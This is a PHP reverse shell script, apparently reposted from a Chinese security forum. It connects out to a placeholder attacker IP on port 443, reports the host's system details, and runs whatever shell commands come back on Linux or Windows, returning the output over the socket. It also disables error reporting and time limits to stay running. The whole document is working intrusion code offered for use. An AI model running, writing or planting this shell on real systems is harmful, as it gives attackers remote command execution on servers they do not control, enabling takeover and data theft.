<?php
error_reporting (E_ERROR);
ignore_user_abort(true);
ini_set(‘max_execution_time‘,0);
$ipaddr = ‘xxx.xxx.xxx.xxx‘;
$port = ‘443‘;
$msg = php_uname()."\n------------Code by Spider-------------\n";
$cwd = getcwd();
function procopen($cmd,$env,$sock) {
global $cwd;
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
fwrite($sock,$msg);
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
fwrite($sock,$msg);
fclose($pipes[2]);
proc_close($process);
}
return true;
}
function command($cmd,$sock) {
if(substr(PHP_OS,0,3) == ‘WIN‘) {
$wscript = new COM("Wscript.Shell");
if($wscript && (!stristr(get_cfg_var("disable_classes"),‘COM‘))) {
$exec = $wscript->exec(‘c:\\windows\\system32\\cmd.exe /c ‘.$cmd); //自定义CMD路径
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
fwrite($sock,$stroutput);
} else {
$env = array(‘path‘ => ‘c:\\windows\\system32‘);
procopen($cmd,$env,$sock);
}
} else {
$env = array(‘path‘ => ‘/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin‘);
procopen($cmd,$env,$sock);
}
return true;
}
$sock = fsockopen($ipaddr,$port);
fwrite($sock,$msg);
while ($cmd = fread($sock,1024)) {
if (substr($cmd,0,3) == ‘cd ‘) {
$cwd = trim(substr($cmd,3,-1));
chdir($cwd);
$cwd = getcwd();
}
if (trim(strtolower($cmd)) == ‘exit‘) {
echo ‘logout!‘;
break;
} else {
command($cmd,$sock);
}
}
fclose($sock);
?>
来源:
https://www.t00ls.net/thread-21255-1-1.html
PHP反弹脚本 Linux/Windows两用